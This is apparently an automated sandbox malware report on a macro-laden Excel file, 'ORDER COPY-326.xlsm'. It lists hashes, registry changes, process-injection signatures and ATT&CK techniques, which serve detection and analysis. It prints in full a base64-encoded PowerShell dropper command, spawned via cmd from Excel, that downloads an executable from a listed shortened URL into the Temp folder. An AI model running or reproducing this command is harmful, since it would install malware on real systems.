Behavioral Report

Analysis

max time kernel
120s
max time network
122s
platform
windows7_x64
resource
win7v20201028
submitted
26-03-2021 15:45

Sharing

Copy URL

Twitter E-mail

Report Files Registry Network Processes Mutex Misc

General

Target

ORDER COPY-326.xlsm
Size

154KB
MD5

9a30f275af39b20ce59988b3c1724a68
SHA1

d35c17ba0c5f09cb212e0a50d117b91d278ec6b3
SHA256

7fe87c98f71cb7cfad4b7713284b7cfe1a0a5e059d5eb5e2c1b322426a6e52ff
SHA512

7898565b62505be720c625899fd3b9f1fb9338a8653066f2c9bf660a1f59fa16529ce4c8e6c1ee597fc3855992ca1e522dce536790c8268ca75684f79636031d

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cutt.ly/fxD7Hr0

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.exe

description	pid	pid_target	process	target process
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	1564	1732	cmd.exe	EXCEL.EXE

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

7 996 powershell.exe
9 996 powershell.exe
Office loads VBA resources, possible macro or embedded object present
Enumerates system info in registry 2 TTPs 1 IoCs

TTPs:

Query Registry System Information Discovery

Processes:

EXCEL.EXE

description ioc process

Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE

flow	pid	process
7	996	powershell.exe
9	996	powershell.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Modifies Internet Explorer settings 1 TTPs 9 IoCs

adware spyware

TTPs:

Modify Registry

Processes:

EXCEL.EXE

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	EXCEL.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	EXCEL.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

1732 EXCEL.EXE
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exe

pid process

996 powershell.exe
996 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 996 powershell.exe
Suspicious use of SetWindowsHookEx 9 IoCs

Processes:

EXCEL.EXE

pid process

1732 EXCEL.EXE
1732 EXCEL.EXE
1732 EXCEL.EXE
1732 EXCEL.EXE
1732 EXCEL.EXE
1732 EXCEL.EXE
1732 EXCEL.EXE
1732 EXCEL.EXE
1732 EXCEL.EXE

pid	process
1732	EXCEL.EXE

pid	process
996	powershell.exe
996	powershell.exe

description	pid	process
Token: SeDebugPrivilege	996	powershell.exe

pid	process
1732	EXCEL.EXE
1732	EXCEL.EXE
1732	EXCEL.EXE
1732	EXCEL.EXE
1732	EXCEL.EXE
1732	EXCEL.EXE
1732	EXCEL.EXE
1732	EXCEL.EXE
1732	EXCEL.EXE

Suspicious use of WriteProcessMemory 12 IoCs

Processes:

EXCEL.EXEcmd.execmd.exe

description	pid	process	target process
PID 1732 wrote to memory of 1564	1732	EXCEL.EXE	cmd.exe
PID 1732 wrote to memory of 1564	1732	EXCEL.EXE	cmd.exe
PID 1732 wrote to memory of 1564	1732	EXCEL.EXE	cmd.exe
PID 1732 wrote to memory of 1564	1732	EXCEL.EXE	cmd.exe
PID 1564 wrote to memory of 1688	1564	cmd.exe	cmd.exe
PID 1564 wrote to memory of 1688	1564	cmd.exe	cmd.exe
PID 1564 wrote to memory of 1688	1564	cmd.exe	cmd.exe
PID 1564 wrote to memory of 1688	1564	cmd.exe	cmd.exe
PID 1688 wrote to memory of 996	1688	cmd.exe	powershell.exe
PID 1688 wrote to memory of 996	1688	cmd.exe	powershell.exe
PID 1688 wrote to memory of 996	1688	cmd.exe	powershell.exe
PID 1688 wrote to memory of 996	1688	cmd.exe	powershell.exe

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\ORDER COPY-326.xlsm"

Enumerates system info in registry
Modifies Internet Explorer settings
Suspicious behavior: AddClipboardFormatListener
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory

PID:1732

C:\Windows\SysWOW64\cmd.exe

cmd /c cmd /c powershell -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAHUAdAB0AC4AbAB5AC8AZgB4AEQANwBIAHIAMAAnACwAKAAkAGUAbgB2ADoAVABlAG0AcAApACsAJwBcAGUAeABjAGUAbAAuAGUAeABlACcAKQA=

Process spawned unexpected child process
Suspicious use of WriteProcessMemory

PID:1564

C:\Windows\SysWOW64\cmd.exe

cmd /c powershell -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAHUAdAB0AC4AbAB5AC8AZgB4AEQANwBIAHIAMAAnACwAKAAkAGUAbgB2ADoAVABlAG0AcAApACsAJwBcAGUAeABjAGUAbAAuAGUAeABlACcAKQA=

Suspicious use of WriteProcessMemory

PID:1688

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAHUAdAB0AC4AbAB5AC8AZgB4AEQANwBIAHIAMAAnACwAKAAkAGUAbgB2ADoAVABlAG0AcAApACsAJwBcAGUAeABjAGUAbAAuAGUAeABlACcAKQA=

Blocklisted process makes network request
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken

PID:996

Network

MITRE ATT&CK Matrix

Collection

Command and Control

Credential Access

Defense Evasion

Modify Registry

T1112

Discovery

Query Registry

T1012

System Information Discovery

T1082

Execution

Exfiltration

Impact

Initial Access

Lateral Movement

Persistence

Privilege Escalation

Replay Monitor

00:00 00:00

Downloads

memory/996-12-0x00000000048C0000-0x00000000048C1000-memory.dmp

Filesize
4KB

Download
memory/996-31-0x0000000006290000-0x0000000006291000-memory.dmp

Filesize
4KB

Download
memory/996-10-0x00000000009E0000-0x00000000009E1000-memory.dmp

Filesize
4KB

Download
memory/996-32-0x00000000062C0000-0x00000000062C1000-memory.dmp

Filesize
4KB

Download
memory/996-11-0x0000000004900000-0x0000000004901000-memory.dmp

Filesize
4KB

Download
memory/996-7-0x0000000000000000-mapping.dmp

Download
memory/996-8-0x0000000075AE1000-0x0000000075AE3000-memory.dmp

Filesize
8KB

Download
memory/996-24-0x0000000006160000-0x0000000006161000-memory.dmp

Filesize
4KB

Download
memory/996-33-0x000000007EF30000-0x000000007EF31000-memory.dmp

Filesize
4KB

Download
memory/996-23-0x00000000060C0000-0x00000000060C1000-memory.dmp

Filesize
4KB

Download
memory/996-9-0x000000006C290000-0x000000006C97E000-memory.dmp

Filesize
6MB

Download
memory/996-13-0x00000000048C2000-0x00000000048C3000-memory.dmp

Filesize
4KB

Download
memory/996-14-0x0000000002550000-0x0000000002551000-memory.dmp

Filesize
4KB

Download
memory/996-15-0x0000000004850000-0x0000000004851000-memory.dmp

Filesize
4KB

Download
memory/996-18-0x00000000055F0000-0x00000000055F1000-memory.dmp

Filesize
4KB

Download
memory/1564-5-0x0000000000000000-mapping.dmp

Download
memory/1688-6-0x0000000000000000-mapping.dmp

Download
memory/1732-3-0x0000000071611000-0x0000000071613000-memory.dmp

Filesize
8KB

Download
memory/1732-2-0x000000002F8D1000-0x000000002F8D4000-memory.dmp

Filesize
12KB

Download
memory/1732-4-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download